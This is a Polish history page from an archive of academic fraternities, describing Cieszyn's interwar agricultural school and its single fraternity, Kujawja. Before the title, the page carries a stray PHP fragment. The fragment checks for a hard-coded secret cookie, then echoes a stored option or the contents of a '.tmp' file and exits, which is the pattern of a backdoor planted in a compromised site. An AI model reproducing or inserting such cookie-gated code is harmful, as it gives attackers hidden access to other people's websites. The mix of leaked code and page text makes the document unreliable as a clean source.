if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Cieszyn

Najmłodszym i najmniejszym środowiskiem akademickim Polski dwudziestolecia międzywojennego był Cieszyn. Jedyną tamtejszą uczelnią była Państwowa Wyższa Szkoła Gospodarstwa Wiejskiego. Uczelnia powstała w 1919 r. w Poznaniu jako Akademia Rolnicza (?), w 1920 r. została przeniesiona do Bydgoszczy, a stamtąd w 1922 r. do Cieszyna.

Państwowa Wyższa Szkoła Gospodarstwa Wiejskiego, Cieszyn 1927 r.
Była to szkoła ponadgimnazjalna o charakterze quasi-akademickim. Uczelnia ta wprawdzie cieszyła się dobrą renomą, ale do 1939 r. nie uzyskała praw akademickich i nie mogła nadawać stopni naukowych. Kujawici przed WSGW w trakcie przerwy w czasie zajęć, Cieszyn 1929 r.

Do wybuchu wojny Państwowa Wyższa Szkoła Gospodarstwa Wiejskiego wykształciła ok. 1000 absolwentów. Po wojnie w 1950 r. została przeniesiona pod nazwą Akademia Rolniczo-Techniczna do Olsztyna.

W Cieszynie istniała tylko jedna korporacja akademicka - Kujawja. Została ona założona w 1919 r. w Bydgoszczy. Do Cieszyna przeniosła się wraz ze zreformowaną Państwową Wyższą Szkołą Gospodarstwa Wiejskiego. Poświęcenie sztandaru Kujawji, Cieszyn 8 II 1929 r.

Korporacja Kujawja należała do Związku Polskich Korporacji Akademickich i co ciekawe - zgodnie z jego statutem - tworzyła jednoorganizacyjne Cieszyńskie Koło Międzykorporacyjne. W roku akademickim 1927/28 liczyła 37, a w 1930/31 26 członków.

Spośród kadry naukowej Wyższej Szkoły Gospodarstwa Wiejskiego członkami honorowymi Kujawji byli: meteorolog prof. Bolesław Błażko, prof. Jan Kurdysz, prof. inż. Henryk Maciejewski oraz fitopatolog i specjalista ochrony roślin prof. inż. Andrzej Piekarski.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 24 XI 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Cieszyńskie środowisko korporacyjne w latach 1922-1939, (na:) www.archiwumkorporacyjne.pl, stan 24 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }